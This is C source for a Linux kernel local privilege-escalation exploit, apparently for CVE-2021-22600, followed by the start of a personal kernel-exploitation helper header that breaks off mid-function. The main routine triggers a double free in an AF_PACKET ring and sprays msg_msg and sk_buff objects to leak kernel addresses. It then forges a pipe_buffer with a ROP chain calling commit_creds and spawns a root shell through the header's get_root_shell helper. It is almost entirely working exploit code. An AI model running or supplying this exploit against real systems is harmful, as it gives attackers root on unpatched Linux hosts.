    rc = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, &proto_version, sizeof(proto_version));
    if (rc < 0) {
        err_exit("[x] failed at setsockopt(PACKET_VERSION)\n");
    }

    /* Build the ring request in one go; members not listed would be zero anyway. */
    struct tpacket_req3 ring_req = {
        .tp_block_size = block_size,
        .tp_block_nr = block_nr,
        .tp_frame_size = frame_size,
        .tp_frame_nr = (block_size * block_nr) / frame_size,
        .tp_retire_blk_tov = timeout,
        .tp_sizeof_priv = sizeof_priv,
        .tp_feature_req_word = 0,
    };

    rc = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &ring_req, sizeof(ring_req));
    if (rc < 0) {
        err_exit("[-] setsockopt (PACKET_RX_RING)");
    }
    return socket_fd;
}


/*
 * Send an all-zero PACKET_RX_RING request on `socket_fd`.
 * Per the walkthrough in the article, this is the call that tears the ring
 * down and frees pg_vec for the first time.
 * A failing setsockopt() is reported through err_exit().
 */
void do_free_first(int socket_fd){
    struct tpacket_req3 empty_req = {0};

    if (setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &empty_req, sizeof(empty_req)) < 0) {
        err_exit("[-] setsockopt (PACKET_RX_RING)");
    }
}

/*
 * Switch `socket_fd` to TPACKET_V2, then send an all-zero PACKET_RX_RING
 * request.
 * Per the walkthrough in the article, this second tear-down is the one that
 * frees the stale pointer again.
 * Failures are reported through err_exit().
 */
void do_free_second(int socket_fd){
    int proto_version = TPACKET_V2;
    struct tpacket_req3 empty_req = {0};

    if (setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, &proto_version, sizeof(proto_version)) < 0) {
        err_exit("[x] failed at setsockopt(PACKET_VERSION)\n");
    }

    if (setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &empty_req, sizeof(empty_req)) < 0) {
        err_exit("[-] setsockopt (PACKET_RX_RING)");
    }
}

/*
 * User-side buffer for the "primary" message of each queue.
 * mtext is sized so that sizeof(struct msg_msg) + sizeof(mtext) equals
 * PRIMARY_MSG_SIZE (struct msg_msg presumably comes from kernelpwn.h).
 */
struct
{
long mtype;
char mtext[PRIMARY_MSG_SIZE - sizeof(struct msg_msg)];
}primary_msg;

/* User-side buffer for the "secondary" message, sized the same way against SECONDARY_MSG_SIZE. */
struct
{
long mtype;
char mtext[SECONDARY_MSG_SIZE - sizeof(struct msg_msg)];
}secondary_msg;

/*
 * Receive buffer for the oversized reads: room for 0x1000 bytes minus a
 * msg_msg header, plus 0x1000 bytes minus a msg_msgseg header.
 */
struct
{
long mtype;
char mtext[0x1000 - sizeof(struct msg_msg) + 0x1000 - sizeof(struct msg_msgseg)];
} oob_msg;

/*
* skb_shared_info need to take 320 bytes at the tail
* so the max size of buf we should send is:
* 1024 - 320 = 704
*/
char fake_secondary_msg[704];

/*
 * Entry point of the CVE-2021-22600 exploit described in the article.
 *
 * Stages, in order:
 *   1. install a TPACKET_V3 RX ring, create the message queues and send one
 *      primary and one secondary message per queue; the two frees of the ring
 *      are issued during and after that loop;
 *   2. spray sk_buff data carrying a fake msg_msg and find the queue whose
 *      peek fails (the victim queue);
 *   3. re-spray with larger sizes to read out of bounds, leaking first a
 *      primary message address and then the address of the freed object;
 *   4. re-spray once more, receive the victim message, create pipes and read
 *      the sk_buffs back to leak the pipe_buffer ops pointer (kernel offset);
 *   5. spray a forged pipe_buffer plus ROP chain and close the pipes.
 *
 * Helpers (build_msg, spray_sk_buff, free_sk_buff, peek_msg, ...), the
 * constants SOCKET_NUM/SK_BUFF_NUM and the globals kernel_offset/kernel_base
 * come from kernelpwn.h, which is not shown here.
 */
int main(int argc , char **argv, char **envp)
{
int msqid[MSG_QUEUE_NUM];
int packet_fds[PG_NUM];
int sk_sockets[SOCKET_NUM][2];
int pipe_fd[PIPE_NUM][2];
int socket_fd;
uint64_t victim_addr;
uint64_t victim_qid;
struct msg_msg *nearby_msg;
struct msg_msg *nearby_msg_prim;
struct pipe_buffer* pipe_buf_ptr;
struct pipe_buf_operations *ops_ptr;
uint64_t *rop_chain;
int rop_idx;
save_status();
bind_core(0);
unshare_setup();

/* Ring with 0x400/8 blocks. */
socket_fd = do_alloc_pg_vec(PAGE_SIZE, 0x800, 0x400/8, 0, 1000);

for (int i = 0; i < MSG_QUEUE_NUM; i++){
if ((msqid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) < 0)
err_exit("failed to create msg_queue!");
}

memset(&primary_msg, 0, sizeof(primary_msg));
memset(&secondary_msg, 0, sizeof(secondary_msg));

/* One tagged primary and one tagged secondary message per queue; the first free happens after queue 1024. */
for (int i = 0; i < MSG_QUEUE_NUM; i++)
{
*(int *)&primary_msg.mtext[0] = MSG_TAG;
*(int *)&primary_msg.mtext[4] = i;
if (write_msg(msqid[i], &primary_msg, sizeof(primary_msg), PRIMARY_MSG_TYPE) < 0)
err_exit("failed to send primary msg!");

*(int *)&secondary_msg.mtext[0] = MSG_TAG;
*(int *)&secondary_msg.mtext[4] = i;
if (write_msg(msqid[i], &secondary_msg, sizeof(secondary_msg), SECONDARY_MSG_TYPE) < 0)
err_exit("failed to send secondary msg!");

if (i == 1024){
do_free_first(socket_fd);
}
}

/* Second free of the same pointer. */
do_free_second(socket_fd);

/* Spray #1: fake secondary message, then locate the queue whose peek now fails. */
init_socket_array(sk_sockets);
puts("[*] spray sk_buff...");
build_msg((struct msg_msg *)fake_secondary_msg, *(uint64_t *)"yhellow", *(uint64_t *)"yhellow", VICTIM_MSG_TYPE, SECONDARY_MSG_SIZE, 0, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

victim_qid = -1;
for (int i = 0; i < MSG_QUEUE_NUM; i++)
{
if (peek_msg(msqid[i], &secondary_msg, sizeof(secondary_msg), 1) < 0){
printf("[+] victim qid: %d\n", i);
victim_qid = i;
}
}
if (victim_qid == -1)
err_exit("failed to make the UAF in msg queue!");

if (free_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to release sk_buff!");

/* Spray #2: larger fake size so the peek reads past the object into the neighbouring message. */
build_msg((struct msg_msg *)fake_secondary_msg, *(uint64_t*)"yhellow", *(uint64_t*)"yhellow", VICTIM_MSG_TYPE, 0x1000 - sizeof(struct msg_msg), 0, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

if (peek_msg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0)
err_exit("failed to read victim msg!");

/* The neighbouring message body must start with the tag, otherwise the spray missed. */
if (*(int *)&oob_msg.mtext[SECONDARY_MSG_SIZE+0x10] != MSG_TAG){
err_exit("failed to rehit the UAF object!");
}

nearby_msg = (struct msg_msg*)&oob_msg.mtext[(SECONDARY_MSG_SIZE+0x10) - sizeof(struct msg_msg)];
printf("\033[32m\033[1m[+] addr of primary msg of msg nearby victim: \033[0m0x%lx\n", nearby_msg->m_list.prev);

if (free_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to release sk_buff!");

/* Spray #3: point the fake message's next field just before the leaked primary message to read it. */
build_msg((struct msg_msg *)fake_secondary_msg, *(uint64_t*)"yhellow", *(uint64_t*)"yhellow", VICTIM_MSG_TYPE, sizeof(oob_msg.mtext), nearby_msg->m_list.prev - 8, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

puts("[*] arbitrary read on primary msg of msg nearby victim");
if (peek_msg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0)
err_exit("failed to read victim msg!");

if (*(int *)&oob_msg.mtext[0x1000] != MSG_TAG)
err_exit("failed to rehit the UAF object!");

/* The primary's m_list.next is the neighbouring secondary message; the freed object sits 0x400 before it. */
nearby_msg_prim = (struct msg_msg*) &oob_msg.mtext[0x1000 - sizeof(struct msg_msg)];
victim_addr = nearby_msg_prim->m_list.next - 0x400;

printf("\033[32m\033[1m[+] addr of msg next to victim: \033[0m0x%lx\n", nearby_msg_prim->m_list.next);
printf("\033[32m\033[1m[+] addr of msg UAF object: \033[0m0x%lx\n", victim_addr);

if (free_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to release sk_buff!");

/* Spray #4: fake message whose list pointers reference itself, then receive it from the victim queue. */
memset(fake_secondary_msg, 0, sizeof(fake_secondary_msg));
build_msg((struct msg_msg *)fake_secondary_msg, victim_addr, victim_addr, VICTIM_MSG_TYPE, SECONDARY_MSG_SIZE - sizeof(struct msg_msg), 0, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

if (read_msg(msqid[victim_qid], &secondary_msg, sizeof(secondary_msg), VICTIM_MSG_TYPE) < 0)
err_exit("failed to receive secondary msg!");

/* Create and write to the pipes. */
for (int i = 0; i < PIPE_NUM; i++)
{
if (pipe(pipe_fd[i]) < 0)
err_exit("failed to create pipe!");

if (write(pipe_fd[i][1], "yhellow", 8) < 0)
err_exit("failed to write the pipe!");
}

/* Read every sk_buff back; one that now holds a kernel-text-looking ops pointer yields the kernel offset. */
pipe_buf_ptr = (struct pipe_buffer *) &fake_secondary_msg;
for (int i = 0; i < SOCKET_NUM; i++)
{
for (int j = 0; j < SK_BUFF_NUM; j++)
{
if (read(sk_sockets[i][1], &fake_secondary_msg,
sizeof(fake_secondary_msg)) < 0)
err_exit("failed to release sk_buff!");

if (pipe_buf_ptr->ops > 0xffffffff81000000){
print_hex(pipe_buf_ptr,sizeof(struct pipe_buffer));
printf("\033[32m\033[1m[+] got anon_pipe_buf_ops: \033[0m%p\n", pipe_buf_ptr->ops);
kernel_offset = (uint64_t)pipe_buf_ptr->ops - 0xffffffff8223d800;
kernel_base = 0xffffffff81000000 + kernel_offset;
memcpy(&secondary_msg,&fake_secondary_msg,sizeof(secondary_msg));
}
}
}

printf("\033[32m\033[1m[+] kernel base: \033[0m0x%lx \033[32m\033[1moffset: \033[0m0x%lx\n", kernel_base, kernel_offset);

/* Forge the pipe_buffer: ops points 0x100 bytes into the same buffer, where the fake ops table is written. */
pipe_buf_ptr = (struct pipe_buffer *) fake_secondary_msg;
pipe_buf_ptr->page = *(uint64_t*) "yhellow";
pipe_buf_ptr->ops = victim_addr + 0x100;

ops_ptr = (struct pipe_buf_operations *) &fake_secondary_msg[0x100];
ops_ptr->release = 0xffffffff8130245e + kernel_offset; // PUSH_RSI_POP_RSP_POP_4VAL_RET

/* ROP chain placed at offset 0x20 of the sprayed buffer. */
rop_idx = 0;
rop_chain = (uint64_t*) &fake_secondary_msg[0x20];
rop_chain[rop_idx++] = kernel_offset + 0xffffffff8100f530; // pop_rdi_ret
rop_chain[rop_idx++] = kernel_offset + 0xffffffff82889040; // INIT_CRED
rop_chain[rop_idx++] = kernel_offset + 0xffffffff810df150; // COMMIT_CREDS
rop_chain[rop_idx++] = kernel_offset + 0xffffffff81e00fb0+22; // SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + 22;
rop_chain[rop_idx++] = *(uint64_t*) "yhellow";
rop_chain[rop_idx++] = *(uint64_t*) "yhellow";
rop_chain[rop_idx++] = get_root_shell;
rop_chain[rop_idx++] = user_cs;
rop_chain[rop_idx++] = user_rflags;
rop_chain[rop_idx++] = user_sp;
rop_chain[rop_idx++] = user_ss;

if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

// for gdb attach only
printf("[*] gadget: %p\n", kernel_offset + 0xffffffff8130245e);
sleep(5);

/* Closing the pipes is the final trigger. */
puts("[*] trigger fake ops->release to hijack RIP...");
for (int i = 0; i < PIPE_NUM; i++)
{
close(pipe_fd[i][0]);
close(pipe_fd[i][1]);
}

return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
1046
1047
1048
1049
/**
* @file kernel.h
* @author arttnba3 (arttnba@gmail.com)
* @brief arttnba3's personal utils for kernel pwn
* @version 1.1
* @date 2023-05-20
*
* @copyright Copyright (c) 2023 arttnba3
*
*/
#ifndef A3_KERNEL_PWN_H
#define A3_KERNEL_PWN_H

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <sys/types.h>
#include <stdio.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/sem.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/wait.h>
#include <semaphore.h>
#include <poll.h>
#include <sched.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>

/**
* I - fundamental functions
* e.g. CPU-core binder, user-status saver, etc.
*/

uint64_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
uint64_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;
uint64_t init_task, init_nsproxy, init_cred;

/**
 * @brief translate a direct-mapping address into an address inside the
 * vmemmap array
 *
 * The address is rounded down to a 4 KiB boundary, turned into a page index
 * relative to the global `page_offset_base`, and that index is scaled by
 * 0x40 and added to the global `vmemmap_base`.
 * NOTE(review): 0x40 is presumably sizeof(struct page) on the target
 * kernel - confirm before reusing elsewhere.
 *
 * @param direct_map_addr address inside the direct mapping area
 * @return size_t vmemmap_base + page_index * 0x40
 */
size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{
    /* drop the in-page offset (low 12 bits) */
    size_t page_start = direct_map_addr & ~(size_t) 0xfff;
    /* number of 4 KiB pages between the direct-map base and this page */
    size_t page_index = (page_start - page_offset_base) >> 12;

    /* each index step is 0x40 bytes in the vmemmap array */
    return vmemmap_base + (page_index << 6);
}

/**
 * @brief hex-dump a buffer, one 8-byte word per row
 *
 * Every row shows the offset, the eight raw bytes in memory order, and the
 * same eight bytes read as one native-endian 64-bit value.
 *
 * @param p    start of the buffer to dump
 * @param size number of bytes to dump; must be a non-negative multiple of 8
 * @return int 0 on success, 1 if `p` is NULL or `size` is invalid
 *             (nothing is printed in that case)
 */
int print_hex(void *p, int size){
    /* a row always prints eight bytes, so the stride is fixed at 8 */
    enum { ROW_BYTES = 8 };
    const unsigned char *buf = (const unsigned char *) p;
    int i;

    if (buf == NULL || size < 0 || size % ROW_BYTES)
    {
        return 1;
    }
    printf("--------------------------------------------------------------------------------\n");
    for (i = 0; i < size; i += ROW_BYTES) {
        uint64_t word;

        /* memcpy instead of a pointer cast: buf may be unaligned */
        memcpy(&word, &buf[i], sizeof(word));
        printf("0x%04x : %02X %02X %02X %02X %02X %02X %02X %02X 0x%llx\n",
               i, buf[i+0], buf[i+1], buf[i+2], buf[i+3],
               buf[i+4], buf[i+5], buf[i+6], buf[i+7],
               (unsigned long long) word);
    }
    return 0;
}

/**
 * @brief report a fatal error and terminate the process
 *
 * Prints `msg` in the file's red "[x]" style, waits five seconds and exits
 * with EXIT_FAILURE. The output is flushed before the wait so the message
 * is visible immediately even when stdout is not a terminal.
 * NOTE(review): the 5-second pause is presumably there so the message can
 * be read before the environment tears down - confirm.
 *
 * @param msg description of what failed; never returns to the caller
 */
void err_exit(const char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg ? msg : "(null)");
    fflush(stdout);
    sleep(5);
    exit(EXIT_FAILURE);
}

/* root checker and shell poper */
void get_root_shell(void)
{
puts("[*] Checking for root...");

if(getuid()) {
puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
sleep(5);
exit(EXIT_FAILURE);
}

puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

system("/bin/sh");

/* to exit the process normally, instead of segmentation fault */
exit(EXIT_SUCCESS);
}

/* userspace status saver */
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
asm volatile (
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

/**
 * @brief bind the calling process to one CPU core
 *
 * Builds a CPU set containing only `core` and applies it with
 * sched_setaffinity(). The outcome is reported on stdout; on failure the
 * function returns without changing anything else.
 *
 * @param core index of the CPU core to run on
 */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);

    /* do not claim success when the kernel rejected the mask */
    if (sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) < 0) {
        printf("\033[31m\033[1m[x] Failed to bind process to core \033[0m%d\n",
               core);
        return;
    }

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

/* for ret2usr attacker */
void get_root_privilige(size_t prepare_kernel_cred, size_t commit_creds)
{
void *(*prepare_kernel_cred_ptr)(void *) =
(void *(*)(void*)) prepare_kernel_cred;
int (*commit_creds_ptr)(void *) = (int (*)(void*)) commit_creds;
(*commit_creds_ptr)((*prepare_kernel_cred_ptr)(NULL));
}

/* write `data` to the file at `path`; returns 0 on success, -1 on failure */
static int unshare_write_file(const char *path, const char *data)
{
    size_t len = strlen(data);
    int fd = open(path, O_WRONLY);
    int ok;

    if (fd < 0) {
        printf("[x] failed to open %s\n", path);
        return -1;
    }

    ok = (write(fd, data, len) == (ssize_t) len);
    close(fd);

    if (!ok) {
        printf("[x] failed to write \"%s\" to %s\n", data, path);
        return -1;
    }

    return 0;
}

/**
 * @brief create an isolated namespace
 * Unshares the mount, user and network namespaces, then denies setgroups
 * and maps id 0 inside the new user namespace to the caller's original
 * uid/gid. Failures are reported on stdout and the setup stops at a failed
 * unshare(); nothing is returned to the caller.
 * note that the calling process **SHOULD NOT** be the one used to get the
 * root; it should only act as an operator that performs basic operations
 * inside the namespace
 */
void unshare_setup(void)
{
    char edit[0x100];
    /*
     * The ids must be read BEFORE unshare(): inside the fresh user namespace
     * they are unmapped, so getuid()/getgid() would return the overflow id
     * and the kernel would reject the mapping written below.
     */
    uid_t outer_uid = getuid();
    gid_t outer_gid = getgid();

    if (unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET) < 0) {
        printf("[x] failed at unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET)\n");
        return;
    }

    /* setgroups must be denied before an unprivileged gid_map write */
    unshare_write_file("/proc/self/setgroups", "deny");

    snprintf(edit, sizeof(edit), "0 %d 1", (int) outer_uid);
    unshare_write_file("/proc/self/uid_map", edit);

    snprintf(edit, sizeof(edit), "0 %d 1", (int) outer_gid);
    unshare_write_file("/proc/self/gid_map", edit);
}

/**
* II - fundamental kernel structures
* e.g. list_head
*/
struct list_head {
uint64_t next;
uint64_t prev;
};

/**
* III - pgv pages sprayer related
* note that we should create two processes:
* - the parent is the one that sends commands and gets root
* - the child creates an isolated namespace by calling unshare_setup(),
* then only receives commands from the parent and carries them out
*/
#define PGV_PAGE_NUM 1000
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

/* each allocation is (size * nr) bytes, aligned to PAGE_SIZE */
struct pgv_page_request {
int idx;
int cmd;
unsigned int size;
unsigned int nr;
};

/* operations type */
enum {
CMD_ALLOC_PAGE,
CMD_FREE_PAGE,
CMD_EXIT,
};

/* pipe for cmd communication */
int cmd_pipe_req[2], cmd_pipe_reply[2];

/* create a socket and alloc pages, return the socket fd */
int create_socket_and_alloc_pages(unsigned int size, unsigned int nr)
{
/* tpacket version for setsockopt */
struct tpacket_req req;
int socket_fd, version;
int ret;

socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if (socket_fd < 0) {
printf("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
ret = socket_fd;
goto err_out;
}

version = TPACKET_V1;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
&version, sizeof(version));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_VERSION)\n");
goto err_setsockopt;
}

memset(&req, 0, sizeof(req));
req.tp_block_size = size;
req.tp_block_nr = nr;
req.tp_frame_size = 0x1000;
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_TX_RING)\n");
goto err_setsockopt;
}

return socket_fd;

err_setsockopt:
close(socket_fd);
err_out:
return ret;
}

/**
 * @brief create an AF_PACKET socket with a TPACKET_V3 RX ring bound to "lo"
 *
 * Any failure is reported with perror() and terminates the process with
 * exit(1), so the function only returns on success.
 *
 * @param block_size  size of each ring block (tp_block_size)
 * @param frame_size  size of each frame (tp_frame_size), must be non-zero
 * @param block_nr    number of blocks (tp_block_nr)
 * @param sizeof_priv size of the per-block private area (tp_sizeof_priv)
 * @param timeout     block retire timeout (tp_retire_blk_tov)
 * @return int the configured and bound socket fd
 */
int packet_socket_setup(uint32_t block_size, uint32_t frame_size,
                        uint32_t block_nr, uint32_t sizeof_priv, int timeout) {
    struct tpacket_req3 req3;
    struct sockaddr_ll sa;
    unsigned int lo_index;
    int version = TPACKET_V3;
    int s;

    /* frame_size is used as a divisor below */
    if (frame_size == 0)
    {
        fprintf(stderr, "[-] packet_socket_setup: frame_size must not be 0\n");
        exit(1);
    }

    s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (s < 0)
    {
        perror("[-] socket (AF_PACKET)");
        exit(1);
    }

    if (setsockopt(s, SOL_PACKET, PACKET_VERSION,
                   &version, sizeof(version)) < 0)
    {
        perror("[-] setsockopt (PACKET_VERSION)");
        exit(1);
    }

    memset(&req3, 0, sizeof(req3));
    req3.tp_sizeof_priv = sizeof_priv;
    req3.tp_block_nr = block_nr;
    req3.tp_block_size = block_size;
    req3.tp_frame_size = frame_size;
    req3.tp_frame_nr = (block_size * block_nr) / frame_size;
    req3.tp_retire_blk_tov = timeout;
    req3.tp_feature_req_word = 0;

    if (setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3)) < 0)
    {
        perror("[-] setsockopt (PACKET_RX_RING)");
        exit(1);
    }

    /* index 0 would silently bind to every interface instead of "lo" */
    lo_index = if_nametoindex("lo");
    if (lo_index == 0)
    {
        perror("[-] if_nametoindex (lo)");
        exit(1);
    }

    memset(&sa, 0, sizeof(sa));
    sa.sll_family = PF_PACKET;
    sa.sll_protocol = htons(ETH_P_ALL);
    sa.sll_ifindex = lo_index;
    sa.sll_hatype = 0;
    sa.sll_pkttype = 0;
    sa.sll_halen = 0;

    if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0)
    {
        perror("[-] bind (AF_PACKET)");
        exit(1);
    }

    return s;
}

/**
 * @brief ask the child process to allocate pages (parent side)
 *
 * Sends a CMD_ALLOC_PAGE request over `cmd_pipe_req` and waits for the
 * child's integer reply on `cmd_pipe_reply`.
 *
 * @param idx  slot index the child stores the resulting socket fd under
 * @param size block size forwarded to the child
 * @param nr   block count forwarded to the child
 * @return int the child's reply, or -1 if the request could not be sent or
 *             the reply could not be read completely
 */
int alloc_page(int idx, unsigned int size, unsigned int nr)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = CMD_ALLOC_PAGE,
        .size = size,
        .nr = nr,
    };
    int ret = -1;

    if (write(cmd_pipe_req[1], &req, sizeof(req)) != (ssize_t) sizeof(req))
        return -1;

    /* a short or failed read would otherwise leave ret undefined */
    if (read(cmd_pipe_reply[0], &ret, sizeof(ret)) != (ssize_t) sizeof(ret))
        return -1;

    return ret;
}

/**
 * @brief ask the child process to free a previous allocation (parent side)
 *
 * Sends a CMD_FREE_PAGE request over `cmd_pipe_req` and waits for the
 * child's integer reply on `cmd_pipe_reply`.
 *
 * @param idx slot index that was passed to alloc_page()
 * @return int the child's reply, or -1 if the request could not be sent or
 *             the reply could not be read completely
 */
int free_page(int idx)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = CMD_FREE_PAGE,
    };
    int ret = -1;

    if (write(cmd_pipe_req[1], &req, sizeof(req)) != (ssize_t) sizeof(req))
        return -1;

    /* a short or failed read would otherwise leave ret undefined */
    if (read(cmd_pipe_reply[0], &ret, sizeof(ret)) != (ssize_t) sizeof(ret))
        return -1;

    return ret;
}

/**
 * @brief command loop of the child process
 *
 * Calls unshare_setup(), then serves requests read from `cmd_pipe_req`
 * until CMD_EXIT arrives or the pipe can no longer be read or written.
 * Every request is answered with one int on `cmd_pipe_reply`:
 *  - CMD_ALLOC_PAGE: result of create_socket_and_alloc_pages()
 *  - CMD_FREE_PAGE:  result of close() on the stored fd
 *  - CMD_EXIT:       0
 *  - anything else, or an out-of-range index: -1
 */
void spray_cmd_handler(void)
{
    struct pgv_page_request req;
    int socket_fd[PGV_PAGE_NUM];
    int ret;

    /* mark every slot unused so freeing an empty slot fails cleanly */
    for (int i = 0; i < PGV_PAGE_NUM; i++)
        socket_fd[i] = -1;

    /* create an isolate namespace */
    unshare_setup();

    /* handle requests */
    do {
        /* EOF or error: the parent is gone, stop instead of spinning */
        if (read(cmd_pipe_req[0], &req, sizeof(req)) != (ssize_t) sizeof(req))
            break;

        ret = -1;

        switch (req.cmd) {
        case CMD_ALLOC_PAGE:
        case CMD_FREE_PAGE:
